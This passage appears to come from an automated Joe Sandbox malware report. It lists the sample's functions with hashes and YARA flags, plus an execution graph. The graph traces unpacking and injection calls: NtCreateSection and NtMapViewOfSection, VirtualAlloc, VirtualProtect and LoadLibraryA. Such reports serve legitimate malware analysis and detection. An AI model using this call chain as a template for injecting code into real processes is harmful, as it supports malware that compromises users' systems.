                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20018E7630C204F7DB00AA819C92EBA32645B44754F204577F607B90F0D67D9A13EB1B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019CF Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
                                                                                                                                                                                                                                        • Instruction ID: 1dabb258173db235a1d95cfc95eeffc66b9799adec5ca63ac31477e601607a68
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7701D675308204F7DB00ABD08C81AAE32689F40314F708177F613B81F0EA3D8612EB5B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00D264E8 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00D26539
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2120426554.0000000000D1F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D1F000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d1f000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction ID: 0b8cd74e3e7bbdebeac2dd895904a5db0700f62a062fc266fff509ddc8595157
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60110B79A00208EFDB01DF98C985E99BBF5EF08751F1580A4F9489B362D771EA90DB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019E7 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
                                                                                                                                                                                                                                        • Instruction ID: 9426f979ca713991860f9ea44d55cd4c2553d935c0e8181050f05289ed5f003d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D401A776309204FBDB00AA959C41AAE37689F45310F204477F607B80F1E67D9A12AB2B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00C2092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2120177869.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c20000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                        • Instruction ID: 094d6338f481556cb36ff65e68cd840269bc6eaaa82a59b3dfc6c50bd4c76108
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04318DB6901619CFDB10DF99D880AAEBBF5FF08324F24404AD441A7712D771EA85CFA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040217B Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 457600ab2e6b562f27fe83362ed4081144c1261d4b4cc3aa12f50db97314043f
                                                                                                                                                                                                                                        • Instruction ID: b0f5cd621e5889a427523276a520302fa0894c53478b04dc76a98a6104f30da4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 457600ab2e6b562f27fe83362ed4081144c1261d4b4cc3aa12f50db97314043f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D41CE632141086B9A41D2183D2709E3BE59BE235CB249BE7C973773FDD1A4C817A1D3
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040217D Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 65407831d01de68012423774c83c3fea81d132f0266d0a4fe9ae100c4471d34c
                                                                                                                                                                                                                                        • Instruction ID: c68037642d2b4b88848a758ef480b741a8d613f7c2e242108568ac126d1cc187
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65407831d01de68012423774c83c3fea81d132f0266d0a4fe9ae100c4471d34c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB41CE63214108679A41D2183D2709E3AE59BE225CB249BE7C973773FDD1A4C817A1D3
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00402188 Relevance: .2, Instructions: 235COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8ba22db28687de17de026d87b7672bc38eea9ddf34eb616ae3223bb44072340c
                                                                                                                                                                                                                                        • Instruction ID: c31f878e4552ee647901d08c13c42c7b9bee46c5546bcd0e406724342d5d4055
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ba22db28687de17de026d87b7672bc38eea9ddf34eb616ae3223bb44072340c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D541CC632101086BDA41C7186C2709D3BE5ABE625CB25ABDAC9736B3FED164C817A183
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004021A1 Relevance: .2, Instructions: 228COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d1b73523a20dd4d5eb758ece85657ff01b49f7dc46b6599c52181d7bae701f2b
                                                                                                                                                                                                                                        • Instruction ID: f27c93ea5fb19a9126cdec7dfb901a61f64bd232b99ff7c89ab316a302d0d062
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1b73523a20dd4d5eb758ece85657ff01b49f7dc46b6599c52181d7bae701f2b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3231BC532101046B9E41C7183C2308E3AE5EFE265CB24ABDAC873673FDD160C81BA1C2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004021CB Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: eaa5821d55b3facc6d0f2f4d590224a1a2e390ab7e4159f8d5c27b876ec7bb2f
                                                                                                                                                                                                                                        • Instruction ID: 71e4ad84544b767bcf39e9c9c4391c0157840b4eb49ede458eb3363319ddbd63
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eaa5821d55b3facc6d0f2f4d590224a1a2e390ab7e4159f8d5c27b876ec7bb2f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C31BB532201086B5E41C7283C2308E3BE6EBE626CB25AFC6C873673FDD550C81BA0D2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004021BB Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f34f3ff7b8f54312045a2530f86cece731e800efabbd60877df90be80f2eb45c
                                                                                                                                                                                                                                        • Instruction ID: b6ca5711a50b7efee0159f302846c4b9acddd6f1e8c6f36e454589e31c9923f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f34f3ff7b8f54312045a2530f86cece731e800efabbd60877df90be80f2eb45c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C3167532115086B5F41D7286C2308E3BE6ABE626DB15ABC6C873673FED550C82BA1D2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00402348 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6f881abd4d4c80bbb0f02f955a74f9b74fb810e8dba993f55cc0282d5e03c3a7
                                                                                                                                                                                                                                        • Instruction ID: 20921a196d2f70f336c197afbd25194a591e440cc2018bb72a27b8d2cfd76f32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f881abd4d4c80bbb0f02f955a74f9b74fb810e8dba993f55cc0282d5e03c3a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4215A73615264CBD3019B18914B45177F0FF81348B2044BBCC83AB2E2D6F9C957969B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00D26106 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2120426554.0000000000D1F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D1F000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d1f000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                        • Instruction ID: e9836218efbd8acd523903bf2d694d0dc2bef424d8e75e1d73976ef0c27c57d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5117072340310AFD745DF59EC81EA673EAEB99364B298055E908CB312E675E812C770
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00C20D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2120177869.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c20000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                        • Instruction ID: dbd9f52f0455be9c9a85d8d64bd5f01d5c068bb76d0068753e9e5296bf8701da
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC012B766016108FDF21CF60E804BAA33F5FB85305F1544B6D516D7643E770A941CB80
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00402745 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: dce77baa00da61873ccb3aa1e018f8e5fad55bea42f980cc92786ab105a08859
                                                                                                                                                                                                                                        • Instruction ID: 69d4b880b733b20b6e6e8d40225c1187dfda2853922bf69f6b380452bfed4421
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dce77baa00da61873ccb3aa1e018f8e5fad55bea42f980cc92786ab105a08859
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95D0A7321D8ABD0E873BAF242405B4B3F91F99D4807D4158CC4D2CF189CB20D593DB84
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004026D2 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f58bfef414fbb703d3dd54ed49dc08676aa3255ce4442ffadb9c2f16a394118f
                                                                                                                                                                                                                                        • Instruction ID: a8b0c3d885e26e12b4b78e6b62be43aeff16635af6dcc451826105f71ea5402b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f58bfef414fbb703d3dd54ed49dc08676aa3255ce4442ffadb9c2f16a394118f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2C02B722C1E336B9B08A10C8CE2BDFF6885936400388100444C2D72C0C300E05304F7
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004027A0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0c8559ce6b849e8630471a8e5d616feba08a7a26a2c0d8d38af4418daa939d9c
                                                                                                                                                                                                                                        • Instruction ID: 38351c2ed745b14c386feeb15f7f798b9746b37af39e32a5701b5c9e944eb928
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c8559ce6b849e8630471a8e5d616feba08a7a26a2c0d8d38af4418daa939d9c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62C0923264112BCFC6358F2DC48CBD573B7AA9970338705AAC8818741ADB20E1AB8F48
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00402770 Relevance: .0, Instructions: 3COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d42159c6503ca90542c3670edd716fcc7f47a8373946eeb85d274a3b270e0fcb
                                                                                                                                                                                                                                        • Instruction ID: 4231ba0c904557ffbbe8bc52a0ffdfb71a90202ecc68a120afadf1cd8174fbf3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d42159c6503ca90542c3670edd716fcc7f47a8373946eeb85d274a3b270e0fcb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:6.2%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:53.7%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:54
                                                                                                                                                                                                                                        Total number of Limit Nodes:5
                                                                                                                                                                                                                                        execution_graph 3596 cb3c6a 3597 cb3c6f 3596->3597 3598 cb3ce0 3596->3598 3601 cb3c79 3597->3601 3602 cb3c88 3601->3602 3605 cb4419 3602->3605 3606 cb4434 3605->3606 3607 cb443d CreateToolhelp32Snapshot 3606->3607 3608 cb4459 Module32First 3606->3608 3607->3606 3607->3608 3609 cb4468 3608->3609 3611 cb3c78 3608->3611 3612 cb40d8 3609->3612 3613 cb4103 3612->3613 3614 cb414c 3613->3614 3615 cb4114 VirtualAlloc 3613->3615 3614->3614 3615->3614 3616 403031 3617 402fbf 3616->3617 3619 40303a 3616->3619 3621 4019b2 3617->3621 3620 402fda 3622 4019c3 3621->3622 3623 4019fc Sleep 3622->3623 3624 401a17 3623->3624 3626 401a28 3624->3626 3627 4015d5 3624->3627 3626->3620 3628 4015e4 3627->3628 3629 401688 NtDuplicateObject 3628->3629 3638 4017a4 3628->3638 3630 4016a5 NtCreateSection 3629->3630 3629->3638 3631 401725 NtCreateSection 3630->3631 3632 4016cb NtMapViewOfSection 3630->3632 3634 401751 3631->3634 3631->3638 3632->3631 3633 4016ee NtMapViewOfSection 3632->3633 3633->3631 3635 40170c 3633->3635 3636 40175b NtMapViewOfSection 3634->3636 3634->3638 3635->3631 3637 401782 NtMapViewOfSection 3636->3637 3636->3638 3637->3638 3638->3626 3639 c7003c 3640 c70049 3639->3640 3652 c70e0f SetErrorMode SetErrorMode 3640->3652 3645 c70265 3646 c702ce VirtualProtect 3645->3646 3648 c7030b 3646->3648 3647 c70439 VirtualFree 3651 c704be LoadLibraryA 3647->3651 3648->3647 3650 c708c7 3651->3650 3653 c70223 3652->3653 3654 c70d90 3653->3654 3655 c70dad 3654->3655 3656 c70238 VirtualAlloc 3655->3656 3657 c70dbb GetPEB 3655->3657 3656->3645 3657->3656 3658 402f3d 3659 402f4e 3658->3659 3660 4019b2 8 API calls 3659->3660 3661 402fda 3659->3661 3660->3661

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 229COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 85 40156b-401577 86 4015a3-4015a6 85->86 87 401579-40157e 85->87 90 4015a8-4015c7 86->90 91 4015fe-401632 call 40125c 86->91 88 401580-401599 87->88 89 40154a-401551 87->89 88->86 92 401553-401569 89->92 93 40151d-401546 call 40125c 89->93 90->91 103 401634 91->103 104 401637-40163c 91->104 92->85 93->89 103->104 106 401642-401653 104->106 107 401959-401961 104->107 111 401957 106->111 112 401659-401682 106->112 107->104 110 401966-4019af call 40125c 107->110 111->110 112->111 120 401688-40169f NtDuplicateObject 112->120 120->111 122 4016a5-4016c9 NtCreateSection 120->122 124 401725-40174b NtCreateSection 122->124 125 4016cb-4016ec NtMapViewOfSection 122->125 124->111 127 401751-401755 124->127 125->124 126 4016ee-40170a NtMapViewOfSection 125->126 126->124 129 40170c-401722 126->129 127->111 130 40175b-40177c NtMapViewOfSection 127->130 129->124 130->111 132 401782-40179e NtMapViewOfSection 130->132 132->111 135 4017a4 call 4017a9 132->135
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
                                                                                                                                                                                                                                        • Instruction ID: 4068bc8a221ecf0939acbdb1e7e88c7e46ae7771e33a0dc799c943c57428cfd7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC717CB4900205BFDB209F91CC48F9BBFB8FF96710F14416AFA52BA2E5D6749901CB64
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 206nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
